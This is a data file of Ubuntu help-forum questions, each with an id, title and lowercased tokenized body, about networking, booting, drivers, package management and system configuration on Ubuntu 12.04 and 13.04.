349281	setting up pxeboot dnsmasq in virutalbox with ubuntu 12.04	my dnsmasq.conf interface=eth1 domain=yourdomain.com dhcp-range=192.168.50.100,192.168.50.200 dhcp-boot=pxelinux.0 , pxeserver,192.168.50.1 enable-tftp tftp-root=/srv my /etc/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp # the primary network interface auto eth1 iface eth1 inet static address 192.168.50.1 netmask 255.255.255.0 network 192.168.50.0 broadcast 192.168.50.255 gateway 192.168.50.1 i start my client which is only a base vm on the same network and it comes back with `` pxe-e51 : no dhcp or proxydhcp offers were received '' i only want 1 server to be the pxeboot and dchp . any ideas on what i am doing wrong .
349283	help setting up a home network wirerd and wireless	im trying to set up a network at my home i have a wireless connection on a dell xps m1330 and im trying to connect my dell inspiron 530 with ethernet cable both are running ubuntu 12.04 please help thank you
349284	ubuntu 13.04 not booting - boot-repair not working	here is the story of what happened and what i did tried . first , i wanted to remove my windows 7 from my computer , so i delete the partition . after doing this , i remembered that i forgot to take something from the drive . so following online instruction , i installed testdisk and followed instruction of how to recuperate the partition . after that , i boot up my computer and got to a grub error . so i loaded a ubuntu live cd and install boot-repair and used the recommended repair . then i boot up and it loaded directly to windows 7 and windows 7 started a disk repair . after that , when i boot up , i could n't boot in ubuntu . so i booted a live cd again and tried the advanced options in boot-repair to see if i could fix it , but the boot-repair isnt seeing grub . so i installed testdisk to see my partition and here is what i got : 1 * hpfs - ntfs 0 32 33 12 223 19 204800 [ system reserved ] 2 p hpfs - ntfs 12 223 20 7192 254 63 115348697 invalid fat boot sector 3 p fat12 7193 1 1 9151 254 63 31471272 3 p fat12 7193 1 1 9151 254 63 31471272 4 e extended lba 9152 0 1 14593 254 63 87425730 5 l hpfs - ntfs 11329 0 32 13286 254 63 31455239 [ storage ] and after a deeper search , i get the following : partition start end size in sectors d hpfs - ntfs 0 32 33 12 223 19 204800 [ system reserved ] d hpfs - ntfs 12 223 19 25 159 5 204800 d hpfs - ntfs 12 223 20 7192 254 63 115348697 d hpfs - ntfs 12 223 20 14593 33 32 234231808 d fat12 7193 1 1 9151 254 63 31471272 d linux 7193 12 52 11328 210 18 66441216 > d hpfs - ntfs 7225 239 55 7238 175 41 204800 d linux 8781 251 47 12917 194 13 66441216 d linux 8785 1 1 12920 198 30 66441216 d linux 8787 87 5 12923 29 34 66441216 d linux 8788 27 8 12923 224 37 66441216 d linux 8788 222 11 12924 164 40 66441216 is there anything i can do to repair this ? thanks for your help !
349285	12.04 reinstall ubuntu whith my past ubuntu 12.04 personalized configuration	i want to re install ubuntu 12.04 again on my usb san disk 16g because i accidentally deleted my boot folder and it doesn´t run , but i personalize it a lot and i want to kept all the configuration of wine , gnome , cairo-dock , and other programs i have . i just ask myself , what are the directories that content all the configuration . i try to copy them all whit root user ( except boot because i don´t have it ._ . ) but some of them don´t want to copy , like some on the dev and mnt folder . i just need to know what files i need to copy to have again my configuration what files i can leave them intact and why the other ones don´t copy . thanks a lot
349288	gone home does n't run in dell inspiron 14z with intel hd 400	i installed steam for linux , and then bought gone home . when i tried to play it , the game starts , and the screen goes black with a little with dot in the middle . it appears to be a graphic card issue . i have a dell inspiron 14z with the native intel hd 4000 graphic card . i installed `` intel linux graphic drivers '' hoping it would fix the problem , but nothing changed . i 've tried various graphic settings and none have worked . hope you could help me overcome this issue . i found a fix that worked in the steam community : http : //steamcommunity.com/app/232430/discussions/1/864976115426684240/ it seems there is a problem with the game when your locale is not english ( maybe other work too ) as pointed out in http : //steamcommunity.com/app/232430/discussions/1/864976115284478645/ # c864976115478302160 . the same workaround works to solve this problem for me . workaround for those who do n't like to click through : publicado originalmente por arderath : the problem is related to locales . the game does n't reset the locale to c , and thus has parsing troubles . a proper fix would be for the game to set its internal locale to c. a temporary workaround to get the game going is to do this yourself : - right click on the game in steam , select «properties» - click «set launch options» - enter : lc_all=c % command % - click ok , and then close . start the game , it should now work ( does here ) .
349291	why ca n't i install ubuntu onto my computer 's hard drive after booting ?	i 've recently booted ubuntu ver . 13.04 onto my acer verticon . it runs great on my computer , and i want it to be my main operating system . the problem is , there is n't an option that lets me download it onto my computer 's hard drive . what do i do ?
349294	problem when compiling gcc in ubuntu	i have run into the well known problem when installing gcc : configure:3605 : error : in /usr/local/gcc-4.8.1/i686-pc-linux-gnu/libgcc ' : configure:3608 : error : can not compute suffix of object files : can not compile although this is well discussed error . my situation is different . i have installed gmp 5.1.2 , mpc 1.0.1 , and mpfr 3.1.2 . and i have set the ld_library_path to the directory where all the libs are located . i can finish the configure part successfully , but still run into the problem mentioned above . i 'm trying to install gcc 4.8.1 . can anyone help me with this ? thanks a lot .
349296	ubuntu 12.04 on macbook pro 8,2 bcm4331 . can not detect wireless networks	i installed ubuntu 12.04 on my macbook pro 8,2 and my wireless card is bcm4331 . i tried many things and it worked for a while actually . however , now it is not working again . it is enabled , but no wireless networks are discovered . $ lsmod |grep b43 b43 392109 0 mac80211 630977 1 b43 cfg80211 525244 2 b43 , mac80211 ssb 57842 1 b43 bcma 41244 1 b43 $ lspci -nn | grep network 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) $ lshw ... *-network description : wireless interface physical id : 2 logical name : wlan0 serial : e0 : f8:47:15 : d3:70 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.8.0-30-generic firmware=666.2 link=no multicast=yes wireless=ieee 802.11bg thanks .
349297	hp pavilion dv6t headphone jack not working on ubuntu 13.04 or 12.04	the headphone jack on my hp pavilion dv6t works on windows , but not on ubuntu . currently i 'm running ubuntu 13.04 ( linux mint 15 cinnamon ) with kernel 3.8.0-19 . i 've also ran ubuntu 12.04/13.04 and many forks of them in the past couple of weeks . the headphone jack has not worked on any of them . the laptop speakers work without any issues , but it 's annoying not to be able to use my headphones . as far as the headphones go , they work fine in my phone as well as other devices , so the headphones are n't the problem . any help is appreciated . let me know if i can provide anymore information about this issue to make it easier for you to help me ( and any others that might have this issue ) . thank you .
349301	booting with a fujitsu siemens	i have a laptop of fujitsu siemens lifebook series with centrino duo 1.6 ghz processor and 2 gb ram and 20 gb hard drive so can i install ubunto 12.04 on this machine , plus i have two non encryptable drives showing on its my computer and i want to remove them so do i have to remove them during installation , if yes , then how ? thank you
349305	ubuntu 13.04 ca n't shutdown after running `` rochard ''	for some unknown reason , every time after i run the game `` rochard '' via steam , i will not be able to shutdown afterwards . my desktop will restart itself after shutdown and i need to force it by pressing the power button . the effect carries on unless i let my computer to power off for some period of time . i 'm very new to linux so i 'm not too sure where to begin the debug . up to now , i 've tried the laptop-mode and editing grub ( adding acpi=noirq ) but neither works .
349306	installing fujitsu drivers on u1010	i 'm running ubuntu/lubuntu 13.04 on a fujitsu u1010 . the installation went well but i ran into trouble when trying to install drivers following instructions on https : //katastrophos.net/andre/blog/2012/05/29/installing-ubuntu-12-04-precise-pangolin-on-fujitsu-u820-u2010-u2020/ i 'm a newbie to linux , so i do n't know how to interpret the screen output but i saw whole bunch of 'error ' and i guess there is something wrong , please help . thanks . details as follow : make all-recursive make [ 1 ] : entering directory `/home/xx/fjbtndrv-2.3.2' making all in src make [ 2 ] : entering directory `/home/xx/fjbtndrv-2.3.2/src' making all in linux make [ 3 ] : entering directory `/home/xx/fjbtndrv-2.3.2/src/linux' make -c /lib/modules/3.8.0-30-generic/build m=/home/xx/fjbtndrv-2.3.2/src/linux modules make [ 4 ] : entering directory `/usr/src/linux-headers-3.8.0-30-generic' cc [ m ] /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.o /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:200:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘input_fujitsu_setup’ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:289:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘fujitsu_dmi_matched’ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:299:15 : error : ‘fujitsu_dmi_matched’ undeclared here ( not in a function ) /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:364:30 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘fujitsu_walk_resources’ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:387:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘acpi_fujitsu_add’ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:425:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘acpi_fujitsu_remove’ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:444:13 : error : ‘acpi_fujitsu_add’ undeclared here ( not in a function ) /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:444:3 : error : initializer element is not constant /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:444:3 : error : ( near initialization for ‘acpi_fujitsu_driver.ops.add’ ) /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:445:13 : error : ‘acpi_fujitsu_remove’ undeclared here ( not in a function ) /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:445:3 : error : initializer element is not constant /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:445:3 : error : ( near initialization for ‘acpi_fujitsu_driver.ops.remove’ ) /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:446:3 : error : unknown field ‘resume’ specified in initializer /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:243:13 : error : ‘input_fujitsu_remove’ defined but not used [ -werror=unused-function ] /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.c:249:20 : error : ‘fujitsu_interrupt’ defined but not used [ -werror=unused-function ] cc1 : all warnings being treated as errors make [ 5 ] : *** [ /home/xx/fjbtndrv-2.3.2/src/linux/fujitsu-tablet.o ] error 1 make [ 4 ] : *** [ _module_/home/xx/fjbtndrv-2.3.2/src/linux ] error 2 make [ 4 ] : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' make [ 3 ] : *** [ fujitsu-tablet.ko ] error 2 make [ 3 ] : leaving directory `/home/xx/fjbtndrv-2.3.2/src/linux' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/xx/fjbtndrv-2.3.2/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/xx/fjbtndrv-2.3.2' make : *** [ all ] error 2
349307	how install mozart 1.4.0 on ubuntu ?	i need the instructions for installing mozart programming system on ubuntu 12.04 .
349308	xen networking issue ubuntu 12.04	while following the official directions , i edited /etc/network/interfaces , and made it look like this : auto lo iface lo inet loopback auto xenbr0 iface xenbr0 inet dhcp bridge_ports eth0 auto eth0 iface eth0 inet manual then as per directions , i restarted networking to enable xenbr0 bridge : sudo /etc/init.d/networking restart wlan0 disappeared from ifconfig . this is a pain because that 's how i get my internet . i had to edit the /etc/network/interfaces back to its original form . auto lo iface lo inet loopback to get back up . so how do i prevent the network from breaking ? i need wlan0 for connectivity . all the tutorials and instructions for making a bridge for xen clients assume that youâre using eth0 as the primary connection . i am trying to set up xen so my vms can use my internet connection on wlan0 . thank you
349316	how do i get names of different outputs available on the system via ssh ?	if i run xrandr from a terminal in the x session i can see the names of different outputs available on the system . for example , i get something like this : screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 8192 x 8192 vga disconnected ( normal left inverted right x axis y axis ) lvds connected ( normal left inverted right x axis y axis ) 1440x900 59.9*+ 1280x854 59.9 1280x800 59.8 that 's great , but it only works if i am on the x session either physically in front of the computer or via remote desktop ( vnc ) . how can i get these same names remotely via ssh instead ? i probably would n't be using xrandr for it , but then what should i use ? with the above example , what i would like to get from ssh is the `` vga '' and `` lvds '' values .
349317	ubuntu 13.04 apt-get and software center crashes	so , for some reasons , the installation of google talk failed and now i can not install anything . first after i tried apt-get , ubuntu asked me to manually run this command , sudo dpkg -- configure -a which went well , but still i get the following error when i try to install anything : sudo apt-get install r-base reading package lists ... done building dependency tree reading state information ... done e : the package google-talkplugin needs to be reinstalled , but i ca n't find an archive for it . so , if i try to reinstall the google-talkplugin , ubuntu software center can not even start ! ! ! how can i fix this bug ?
349319	do i have to reinstall all my programs when install ubuntu as a secondary os on my pc ?	i have windows 7 installed on my pc right now with a number of programs . will i have to install second copies of all these programs if i install ubuntu as a secondary os to run on the same pc ?
349324	use usb to install	i use my usb to install ubuntu . it seems that i 've succeed when i installed it.but when i restart my computer and choose ubuntu to start , it goes to install interface again ? what 's wrong ?
349326	unable to install tor : chown missing operand	i get the following error message while starting tor : flagg @ flagg-emachines-e627 : ~ $ sudo chown -rv $ flagg ~/.tor-browser [ sudo ] password for flagg : chown : missing operand after â/home/flagg/.tor-browserâ try 'chown -- help ' for more information . flagg @ flagg-emachines-e627 : ~ $ i get this message or a file doesnt exist error when trying to run chown command i am such a newbie and i probably screwed up while updating to ubuntu 13.04 or during the tor install .
349329	how to go to a folder in terminal	i 'm new to ubuntu and i need to know how i go to a folder on my desktop in terminal . i also need to extract a file from the folder if you could tell me where to put the command to extract it as well . thanks
349333	ca n't boot ubuntu 12.04 `` could not write bytes : broken pipe ''	system : 4gb ram ; 500gb disk i have tried some of the solutions i have seen about this error and none have helped . here is the history : 1 . i have been running 12.04 lte for about a year now with no problems . last week i booted and got error `` checking battery state ... [ ok ] '' upon boot . i could do ctrl-alt-f1 and get to a terminal , so i tried some remedies online ( e.g . reinstalling nvidia ) , and none helped . i finally bit the bullet and rebuilt my system from scratch . i was about 80 % through restore and boot my system and upon boot got error `` could not write bytes : broken pipe '' and could go no further unless i go to safemode ( which is read-only ) . i tried memory check and fsck , and both came up clean . bit bullet again and went for restore . i thought maybe my hdd was too hot , so i made sure it has better ventilation . i was about 95 % through restore and boot my system and upon boot got error `` could not write bytes : broken pipe '' again . bit bullet again and went for restore . argghh ! in both cases i had a thumb drive with nothing but a simple text file , so i do n't think that was an issue . in both cases i did a clean reinstalls . the only way i can boot now is in safe mode , or booting to install thumb drive . if anyone knows the cause or fix , please help ! thanks , doug
349334	partial upgrade problem	failed to fetch http : //ftp.oleane.net/ubuntu/pool/main/i/ifupdown/ifupdown_0.7~beta2ubuntu9_i386.deb 404 not found keep getting the above message when performing partial upgrade . nothing wrong with connection . any help ?
349338	gtk error in vmware player for 12.04 lts	installing vmware player for 64-bit ubuntu 12.04 lts : https : //www.vmware.com/go/downloadplayer i get these errors : $ sudo sh vmware-player-6.0.0-1295980.x86_64.bundle extracting vmware installer ... done . ( vmware-installer.py:8805 ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' gtk-message : failed to load module `` canberra-gtk-module '' : libcanberra-gtk-module.so : can not open shared object file : no such file or directory i have tried : sudo apt-get install -- reinstall gtk2-engines sudo apt-get install gtk-murrine-engine sudo apt-get install gtk2-murrine-engine sudo apt-get install gtk2-murrine-engine : i386 has anyone fixed this ?
349340	not able to configure reliance netconnect usb dongle with ubuntu 12.04 lts	i 've a netconnect usb dongle which is i am not able to use with ubuntu 12.04 lts . i am noob lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 004 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 007 : id 0cf3 : e004 atheros communications , inc . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0bda:58c2 realtek semiconductor corp . i 've used wvdial which says kp-15 : ~ $ sudo wvdial [ sudo ] password for user : -- > wvdial : internet dialer version 1.61 -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory i 've also used gnome-ppp and tried all combination of 'eevice ' and 'type ' to let the gui detect the modem . but gui tool was not able to detect the connected modem . please help .
349342	ubuntu 12.04 after upgrade wireless stopped working	this is about my recent experience with dell inspiron 3537 . ubuntu was the default os installed in the laptop and after some upgrade , wireless stopped working . i tried some suggestions like removing certain things etc but i do not have any luck as of now . please suggest a solution .
349344	incorrect raid 0 partition table during install	after failing to install 13.04 ( uefi , 2x128gb ssd 's , raid0 ) i gave up and switched to legacy expecting it to be a breeze . i 've got a msi ge40 which advertises superraid ( i think it 's still fakeraid ) what i 've done so far : recreated a new raid 0 configuration installed win 8 on 195gb of the 256gb raid now i 'm up to installing 13.04 . during the install the manual partition table shows : /dev/mapper/isw_hhaaecdah_v freespace ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ..256066mb /dev/mapper/isw_hhaaecdah_v1 /dev/mapper/isw_hhaaecdah_v1 ntfs ... ... ... ... ..367mb ( winbootloader ) /dev/mapper/isw_hhaaecdah_v2 /dev/mapper/isw_hhaaecdah_v2 ntfs ... ... ... ... ..204105mb ( win8 ) which is really thowing me as i know if i go ahead and create my ubuntu partitions in the freespace will screw up the rest of the drive . question : how do i force it to read the drives correctly . so far i 've gone into win8 and set the ~48gb freespace to use at the end of the drive as raw and tried to go back but i could n't edit that because it gets mapped incorrectly like the 2 partitions above . also tried : sudo dmraid -re my googling over the last few hours has n't yielded any other fruitful ideas . thanks for any input .
349346	how to log out from ftp server ?	guys i 'm using vsftpd server and logged in using my local user account . but i want to log out from the ftp server and there is no option of log out there . can anyone help me ... . ?
349348	sudo does n't ask for password anymore	i did not notice it but it has been quite a while since i entered the password for using sudo priviledges . here is my /etc/sudoers file : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d % jupiter all=nopasswd : /usr/lib/jupiter/scripts/bluetooth , /usr/lib/jupiter/scripts/camera , /usr/lib/jupiter/scripts/cpu-control , /usr/lib/jupiter/scripts/resolutions , /usr/lib/jupiter/scripts/rotate , /usr/lib/jupiter/scripts/touchpad , /usr/lib/jupiter/scripts/vga-out , /usr/lib/jupiter/scripts/wifi this worries me because any script can now run without me having to enter the password . i have seen the following questions , but they seem unrelated to this post : sudo does not ask for password no password prompt for sudo how do i make sudo always prompt me for a password ( expept for the timeout duration given in /etc/sudoers file ? p.s . : i have some aliases set in my .bash_aliases that have commands using sudo , but i hope that is unrelated to the password prompt , or is it ?
349349	imap4 error on lotus notes 9.0	recently i have installed lotus notes 9 on ubuntu 13.04 64 bit to access my official emails using imap connectivity . however , i am continuously getting imap error `` imap4 maximum number of bad requests received from server exceeded '' which i am unbale to fix . however , when i access the same email server through thunderbird , no error is encountered . is this an issue with installation of ln client on ubuntu ?
349350	getting boot.img from a phone	in a blog , i have read that boot.img can be pulled from an ubuntu phone , but it did not describe how to do so . how do i go about doing that ? i am using ubuntu 13
349356	unix signal handling in qt embedded linux	i have an application for the usb interface in qt ( embedded linux ) . when a pen-drive is inserted , the kernel sends a signal for that and i want to recognize that signal and i want my qt application to detect it . i went through the unix signal handling tutorial of qt but i could not find any way of my problem . i implemented the same thing as done in the tutorial but i did not find the way to detect the pen-drive . it only kills the processes . please go through the following link . qt unix signal handling i have also found using qdbus library of qt . i cross compiled it but gave me the errors of lidbus version . is there any other way to detect the external pendrive from the application ?
349357	why service restart fails with : -restart : unknown instance:	root @ kumarswamys-desktop : /etc # sudo /usr/sbin/service vsftpd restart restart : unknown instance :
349358	how do i replace adobe shockwave with lightspark	i am trying to display videos from a site which wants adobe shockwave and for a very long time it does n't work . i decided to use lightspark instead . however i ca n't get it to fly . i 've installed lightspark from the repository and in the firefox add-ons i see both the adobe and the lightspark version . adobe is : libflashplayer.so application/x-shockwave-flash ( shockwave flash : swf ) , application/futuresplash ( futuresplash player : spl ) lightspark is another entry : liblightsparkplugin.so application/x-shockwave-flash ( shockwave flash : swf ) , application/x-lightspark ( lightspark player : swfls ) the adobe is version 11.2.202.310 , which is the last version offered by adobe . what i would like to do is dump the adobe and use lightspark in its place . i tried to `` never activate '' the adobe and `` always activate '' the lightspark , but that does n't work . either both are activated or neither is activated . i tried using synaptic to find and remove libflashplayer , but it is unknown to synaptic . it seems somewhat heavy handed to just go in and delete the library , so what is the proper way to get rid of adobe ? will that then bring up lightspark in its place ? thanks , ilan
349361	showing error message in terminal	when i am opening a terminal it is always showing the below error message . warning : root : python-html2text is not present . html pages will not be converted into text . please help me how can i remove this error . i have tried many times to install python-html2text from ubuntu software center as well as using command from terminal but it is not happening . it is showing the message requires installation of untrusted packages and this requires installing packages from unauthenticated sources . please help me a way out .
349363	serial port not sending keystrokes	i have been using putty for serial communication to a target for quite some time . but today , all the previous settings intact , i am not able to send key strokes to the target from ubuntu 13.04 . just logged back in today at office and suddenly cant send any commands to the target , i am able to see all the usual output from the target on putty , but its just not responding to my keyboard . how to find what happened ? the same target can be issued commands from other machine 's serial port though.. so sometjing went wrong on my machine only . please help in finding the cause . thanks .
349365	screen backlight problem ubuntu 13.04 lenovo g700	i have installed ubuntu 13.04 on lenovo g700 laptop . screen backlight is going off after boot . i have tried to fix it with setting grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' in /etc/default/grub file - in that case backlight is set up to 100 % and i am not able to change it . i am looking for a solution when screen is not black after boot and i am able to change the backlight .
349370	the meaning of ./ before a command	while i was executing a c program in terminal i wrote : gcc -o demo demo.c ./demo actually my doubt is why we write ./ before demo and what does it mean ?
349378	network issue unable to connect to lan	i 'm running 04 along with windows 7 . in windows , i am able to connect to network through lan . in ubuntu however , there seems to be a problem ; it 's not connecting . it 's unable to discover the lan . please help me .
349380	new uefi 13.04 install - does not recognise usb devices	i just installed 13.04 on a blank ssd , on a new pc with uefi , 64bit and two monitors . it runs , but the same 'picture ' appears on both monitors and i can not get it to recognise the wireless internet .
349381	how to revert from newest wine update to the previous one	i just updated my computer this morning using software updater . after the update completed , i can no longer use windows line app . can i revert the update back to the previous one ? thanks .
349382	make the daily log rotate run on exact time	i have ubuntu 12.04.2 lts server . my daily log rotations which are listed under /etc/logrotate.d/ are executed at the morning around 7:00 am , but it is not on exact time , each day it changed on range of ( 07:00 - 07:25 ) , how can i prevent the random time execution of log rotation ? /etc/crontab file content : shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin \ # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 0 7 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) /etc/cron.daily/logrotate content : \ # ! /bin/sh \ # clean non existent log file entries from status file cd /var/lib/logrotate test -e status || touch status head -1 status > status.clean sed 's/ '' //g ' status | while read logfile date do [ -e `` $ logfile '' ] & & echo `` \ '' $ logfile\ '' $ date '' done > > status.clean mv status.clean status test -x /usr/sbin/logrotate || exit 0 /usr/sbin/logrotate /etc/logrotate.conf related thread : specify the time of daily log rotate
349383	bad image quality in ubuntu	i am using my logitech camera with carl-zeiss lens on ubuntu . when i use the camera to take picture on a website which uses flash plugin , the resultant image is very bad ( image is pixelated and borders are distorted ) . same camera on windows gives great results . i also tried a website in which picture is captured using html5 and there also the quality of image is not good ( borders are distorted ) . do i require any special driver for getting good quality images or does anyone know the reason for this and/or have a fix for same ?
349385	how to start terminator with a custom command per window ?	this seems like a typical use-case yet i ca n't find a way to do it- i created a layout having multiple windows . i want each window to open an ssh session to a different server .
349387	install ubuntu 13.04 offline	i want to install ubuntu 13.04 using wubi ( without partition ) and offline instalation . could anyone help me ? everytime i install , it always download.. dell inspiron 1440
349388	unencrypted /boot partition can be infected from windows on dual-boot system ?	i have dual-boot with windows 7 and ubuntu . /dev/sda1 ext4 ( /boot ) /dev/sda2 ntfs ( windows partition ) /dev/sda5 ext4 ( root encrypted ) i do n't have any concern of adversaries gaining physical access to my laptop and installing keylogger on unencrypted /boot partition . but my concern is that if my windows 7 is compromised by adversary could they ( without physical access ) : enable windows to recognise ext4 boot partition and install keylogger there to record paraphrase on next ubuntu boot . read paraphrase collected by keylogger on next windows boot . use that paraphrase to unlock linux root partition from windows , and replace original kernel . or am i being paranoid ? i m linux newbie , and very concerned about privacy . please help .
349389	proxy setting in terminal but my password consist ' @ '	i was googling about proxy setting in terminal . example answer : for your apt-get to work , you should edit your apt config file : sudo gedit /etc/apt/apt.conf and add acquire : :http : :proxy `` http : //username : password @ proxyhost : port/ '' ; the syntax shown above should be strictly followed . this configuration may fail if your username or password has an ' @ ' in it . you can also add proxy configuration for other protocols such as ftp . my problem is how when my password consist ' @ ' character , but not change my password thanks .
349390	since august i ca n't upgrade the kernel any more	i have this weird issue since about 1 month ago . i used to routinely apply dist upgrades with : apt-get update apt-get dist-upgrade but since 1 month ago i get an output similar to this : apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be removed : apparmor console-setup grub kbd linux-image-3.2.0-23-generic linux-image-3.2.0-31-generic linux-image-3.2.0-49-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic linux-image-3.2.0-53-generic linux-image-server linux-server ntfs-3g plymouth-theme-ubuntu-text ubuntu-minimal the following new packages will be installed : libudev1 the following packages have been kept back : udev 0 upgraded , 1 newly installed , 15 to remove and 1 not upgraded . need to get 48.1 kb of archives . after this operation , 904 mb disk space will be freed . do you want to continue [ y/n ] ? that is , ubuntu wants to ( correctly ) remove the old kernel image but does not install the new one , it does not even propose it . do you know what is wrong with this ? i do have some 3rd party repos installed but i need them and they are quite famous ( and thus should work ) : php , nginx , varnish and mysql . thanks in advance . edit : i did want to see what would happen by pressing enter at the `` do you want to continue [ y/n ] ? '' question . so i made a backup and then upgraded . unsurprisingly enough , ubuntu would not reboot any more .
349391	removing old postgresql after upgrading ?	i upgraded my postgresql to 9.3 following the instruction found here when i run sudo service postgresql start it shows * starting postgresql 9.1 database server ... done . * starting postgresql 9.3 database server ... done . i just want to use 9.3 now , ( do n't even need to start 9.1 ) and how do i do that ?
349392	i got stuck at 'waiting for device ' while installing ubuntu on galaxy nexus	i have stuck at 'waiting for device ' while installing ubuntu on samsung galaxy nexus . it reboots into android . so me further to install ubuntu .
349395	using ubuntu as a thin client	i 'm kind of stuck with a problem i 'm trying to solve . my company wants to go fully remote desktop services and eventually we will be using proper terminal hardware like dell or hp , but as that 's going to cost over âł20,000 i 'm looking at using ubuntu as a thin client so we can spread the costs . we have windows 2008 server , and that wo n't be able to change for the foreseeable future . what i 'm trying to do is that when the pc boots up it loads straight in to a rdp client and lock out every other functionality so the user can only be in a remote session . i 've tried looking around and ca n't find any guides . i 'm very noobish when it comes to linux . any help will be greatly appreciated .
349398	usb hdd does n't persist during suspend when on usb 3.0 ( makes mount points invalid )	i have an external harddrive with three partitions , which is recognized as /dev/sdb at boot . after suspending and resuming the mounted partitions ( in my case additionally encrypted with luks ( two of them ) and truecrypt ( the third ) ) are no longer read-/writeable . the following output of dmesg shows that it seems to map the harddrive to sdc instead of sdb at resume which leads to the wrong behaviour . http : //pastebin.com/8vgaksyf line 28/29 : hdd disconnected ( usb bus 6 , device 2 , i.e . 6-1 ) , then it tries to syncronizes cache ? ! line 262 : hdd found again lines 282 ff . : device name sdc ... i checked the persistence option for usb devices but as it should it was already activated . a kernel update from 3.2.0 to 3.8.0 did n't touch my problem . any suggestions ? edit : i just recognized that the problem only occurs on usb 3.0 ports , not on usb 2.0 . this might help spotting the cause of the problem .
349401	howto add recent into nautilus ubuntu 12.04.3 ?	how can i add a bookmark for recent files in nautilus on ubuntu 12.04.3 lts ?
349405	altova mapforce 2013 not picking up odbc drivers when installed in wine	i am trying to install altova mapforce enterprise edition 2013 ( 32bit ) in ubuntu using wine ( crossover ) . the installer installs fine and the program launches as well . however , when i try to connect to the database , ( oracle xe 11g ) , its not able to find the odbc/jdbc drivers in the installation path . this does not happen in windows . i have tried the latest version of wine as well , both give me the same problem . can anyone suggest a way to get odbc/jdbc drivers detected in wine ? thanks in advance
349416	how to ask for a newer software version ?	i would like to know what 's the recommended procedure to submit a request for a newer software version ? an example : i really like gthumb a lot , but the current version in ubuntu 13.04 & 13.10 is 3.0.2 . the last gthumb is 3.2.3 and was released this last august . so , how to submit the request about refreshing a software like gthumb ? thanks ?
349417	i could n't connect my belkin usb wireless adaptor in ubuntu 12.04	i new for linux community , i have installed ubuntu 12.04 version . how can i connect my usb wireless adaptor . whenever i log in to ubuntu the network signal is shown but i could n't connect to the internet . i have no cd/dvd drive . i have also installed windows 7 ultimate in the parallel connection . if anybody can help me i really grateful for those guys . and then , i want to learn how can i use ubuntu please suggest some basic books . with regards gosiv
